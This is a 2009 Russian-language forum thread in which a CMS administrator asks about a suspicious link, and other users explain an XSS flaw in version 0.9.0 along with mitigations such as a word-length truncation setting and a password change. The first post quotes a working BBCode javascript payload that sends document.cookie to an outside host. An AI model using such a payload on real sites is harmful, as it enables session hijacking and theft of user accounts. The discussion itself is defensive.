Вы не вошли.
Мне тут сообщили что в движке есть дырка и прислали код
[url=javascript:location.replace("http://bestwebart.ru/a.php?"+document.cookie)]Мессага[/url]Как я поинмаю эта штука ворует кукисы. верно? На сколько это опасно и как это исправить? Чем для меня как админа может вылиться переход по этой ссылке?
Отредактировано Luca (2009-06-11 19:12:17)
Вне форума
1. В 0.9.0 Release действительно были свои активные XSS уязвимости, в комментариях, в SVN версии уже закрыты.
2. Если у тебя стоит "Автоурезание слов в комментариях" = 50, то код порежется и не обработается парсером.
3. В 0.9.0 Release, если ты перешёл по ссылке, то тебе лучше всего сменить пароль, т.к. ты в таком случае потенциально уязвим.
Скрипту отправляется инфа: PHPSESSID=сессия; zz_auth=cookie; com_username=логин; com_usermail=e-mail
Т.е. фактически можно расшифровать по cookie твой пароль.
P.S. Это называется php sniffer.
Отредактировано infinity237 (2009-06-11 19:38:49)
Вне форума
Пароль расшифровать нельзя
o_O
Можно объяснить почему это нельзя?
Вне форума
Прошу прощения, действительно был не прав...
Всё сделано по-хитрожопому... )
Вне форума
А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.
Вне форума
автоурезание как раз и не даёт таким ссылкам пройти...
Вне форума
А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.
Лучше на 20 поставить, ссылочки в комментариях не так важны, как безопасность. При желании можно и поудалять пробельчики, если нужно перейти по ссылке :)
Вне форума
[ Сгенерировано за 0.011 сек, 7 запросов выполнено - Использовано памяти: 540.24 Кбайт (Пик: 561.24 Кбайт) ]